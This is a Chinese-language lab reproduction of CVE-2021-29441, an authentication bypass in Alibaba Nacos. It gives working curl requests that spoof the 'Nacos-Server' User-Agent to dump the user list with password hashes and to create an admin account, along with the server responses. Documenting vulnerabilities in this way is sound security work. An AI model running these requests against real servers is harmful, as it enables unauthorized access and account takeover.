Nacos 权限认证绕过漏洞复现
Preface
https://github.com/alibaba/nacos/issues/4701
https://nvd.nist.gov/vuln/detail/CVE-2021-29441
Alibaba Nacos权限认证绕过漏洞复现
https://www.freebuf.com/vuls/263845.html
环境搭建
wget https://github.com/alibaba/nacos/releases/tag/2.0.0-ALPHA.1 tar -zxvf nacos-server-2.0.0-ALPHA.1.tar.gz cd nacos/bin ./startup.sh -m standalone
访问 http://ip:8848/nacos/#/login,使用默认账号密码:nacos/nacos
http://10.63.0.14:8848/nacos/#/login
复现记录
Step1 : 查看当前用户列表
http://10.63.0.14:8848/nacos/v1/auth/users?pageNo=1&pageSize=100
Step2:启用认证
修改配置文件 conf/application.properties,启用nacos.core.auth.enabled
ps -ef | grep nacos kill -9 nacos-pid cat conf/application.properties | grep nacos.core.auth.enabled nacos.core.auth.enabled=true 再次启动 ./bin/startup.sh -m standalone
访问接口:
curl -X GET 'http://10.63.0.14:8848/nacos/v1/auth/users?pageNo=1&pageSize=9' {"timestamp":"2022-03-07T19:05:12.209+08:00","status":403,"error":"Forbidden","message":"unknown user!","path":"/nacos/v1/auth/users"}%
Step 3:绕过
curl -X GET 'http://10.63.0.14:8848/nacos/v1/auth/users?pageNo=1&pageSize=9' -H 'User-Agent: Nacos-Server' | python -m json.tool { "pageItems": [ { "password": "$2a$10$EuWPZHzz32dJN7jexM34MOeYirDdFAZm2kuWj7VEOJhhZkDrxfvUu", "username": "nacos" } ], "pageNumber": 1, "pagesAvailable": 1, "totalCount": 1 }
Step 4: 创建用户
curl -X POST 'http://10.63.0.14:8848/nacos/v1/auth/users?username=admin&password=admin' -H 'User-Agent: Nacos-Server' | python -m json.tool { "code": 200, "data": null, "message": "create user ok!" } curl -X GET 'http://10.63.0.14:8848/nacos/v1/auth/users?pageNo=1&pageSize=9' -H 'User-Agent: Nacos-Server' | python -m json.tool { "pageItems": [ { "password": "$2a$10$EuWPZHzz32dJN7jexM34MOeYirDdFAZm2kuWj7VEOJhhZkDrxfvUu", "username": "nacos" }, { "password": "$2a$10$FW35Bu3vApps1EmIm105eOuAEP2UBAxXbXtEwIpdxkEMmn/Qvr7de", "username": "admin" } ], "pageNumber": 1, "pagesAvailable": 1, "totalCount": 2 }
# 用户管理 :http://10.63.0.14:8848/nacos/#/userManagement
也可以看到我们创建的用户
以上!